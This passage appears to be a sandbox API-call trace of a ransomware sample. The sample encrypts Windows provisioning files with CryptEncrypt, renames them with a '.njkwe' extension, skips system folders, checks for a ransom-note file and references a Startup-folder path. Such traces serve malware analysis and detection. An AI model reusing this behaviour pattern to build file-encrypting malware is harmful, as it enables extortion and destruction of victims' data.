dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.190] GetTickCount () returned 0x1153a27 [0077.190] GetTickCount () returned 0x1153a27 [0077.190] GetTickCount () returned 0x1153a27 [0077.190] GetTickCount () returned 0x1153a27 [0077.190] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.190] GetProcessHeap () returned 0xbe0000 [0077.190] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.190] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0077.191] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.191] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0077.191] GetProcessHeap () returned 0xbe0000 [0077.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.191] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.191] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.192] CloseHandle (hObject=0x43c) returned 1 [0077.192] GetProcessHeap () returned 0xbe0000 [0077.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.192] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\187__connections_cellular_vodafone hu (hungary)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\187__Connections_Cellular_Vodafone HU (Hungary)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\187__connections_cellular_vodafone hu (hungary)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.193] GetProcessHeap () returned 0xbe0000 [0077.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.193] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070cc83, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9070cc83, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9070cc83, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", cAlternateFileName="188__C~1.PRO")) returned 1 [0077.193] lstrcmpiW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.193] lstrcmpiW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.193] lstrcmpiW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.193] lstrcmpiW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.193] lstrcmpiW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.193] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml") returned 165 [0077.193] StrStrIW (lpFirst="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.193] lstrcmpW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.193] lstrcmpW (lpString1="188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.193] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.193] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\188__connections_cellular_vodafone hu (hungary)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.193] GetTickCount () returned 0x1153a27 [0077.193] GetTickCount () returned 0x1153a27 [0077.193] GetTickCount () returned 0x1153a27 [0077.193] GetTickCount () returned 0x1153a27 [0077.193] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.193] GetProcessHeap () returned 0xbe0000 [0077.194] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.194] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e3, lpOverlapped=0x0) returned 1 [0077.195] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.195] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e3, lpOverlapped=0x0) returned 1 [0077.195] GetProcessHeap () returned 0xbe0000 [0077.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.195] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.196] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.196] CloseHandle (hObject=0x43c) returned 1 [0077.196] GetProcessHeap () returned 0xbe0000 [0077.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.196] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\188__connections_cellular_vodafone hu (hungary)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\188__Connections_Cellular_Vodafone HU (Hungary)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\188__connections_cellular_vodafone hu (hungary)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.196] GetProcessHeap () returned 0xbe0000 [0077.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.197] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070cc83, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9070cc83, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9070cc83, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="189__C~1.PRO")) returned 1 [0077.197] lstrcmpiW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.197] lstrcmpiW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.197] lstrcmpiW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.197] lstrcmpiW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.197] lstrcmpiW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.197] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.197] StrStrIW (lpFirst="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.197] lstrcmpW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.197] lstrcmpW (lpString1="189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.197] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.197] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\189__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.197] GetTickCount () returned 0x1153a27 [0077.197] GetTickCount () returned 0x1153a27 [0077.197] GetTickCount () returned 0x1153a27 [0077.197] GetTickCount () returned 0x1153a27 [0077.197] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.197] GetProcessHeap () returned 0xbe0000 [0077.197] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.197] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.198] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.198] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.198] GetProcessHeap () returned 0xbe0000 [0077.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.199] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.199] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.200] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.200] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.200] CloseHandle (hObject=0x43c) returned 1 [0077.200] GetProcessHeap () returned 0xbe0000 [0077.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.200] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\189__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\189__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\189__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.201] GetProcessHeap () returned 0xbe0000 [0077.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.201] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="18__CE~1.PRO")) returned 1 [0077.201] lstrcmpiW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0077.201] lstrcmpiW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0077.201] lstrcmpiW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0077.201] lstrcmpiW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0077.201] lstrcmpiW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0077.201] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 161 [0077.201] StrStrIW (lpFirst="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0077.201] lstrcmpW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.201] lstrcmpW (lpString1="18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0077.201] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\18__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.201] GetTickCount () returned 0x1153a27 [0077.201] GetTickCount () returned 0x1153a27 [0077.201] GetTickCount () returned 0x1153a27 [0077.201] GetTickCount () returned 0x1153a27 [0077.201] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.202] GetProcessHeap () returned 0xbe0000 [0077.202] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.202] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d0, lpOverlapped=0x0) returned 1 [0077.203] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.203] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d0, lpOverlapped=0x0) returned 1 [0077.203] GetProcessHeap () returned 0xbe0000 [0077.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.203] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.203] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.205] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.205] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.205] CloseHandle (hObject=0x43c) returned 1 [0077.205] GetProcessHeap () returned 0xbe0000 [0077.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.205] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\18__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\18__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\18__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.206] GetProcessHeap () returned 0xbe0000 [0077.206] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.206] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90732eea, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90732eea, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90732eea, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="190__C~1.PRO")) returned 1 [0077.206] lstrcmpiW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.206] lstrcmpiW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.206] lstrcmpiW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.206] lstrcmpiW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.206] lstrcmpiW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.206] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml") returned 163 [0077.206] StrStrIW (lpFirst="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.206] lstrcmpW 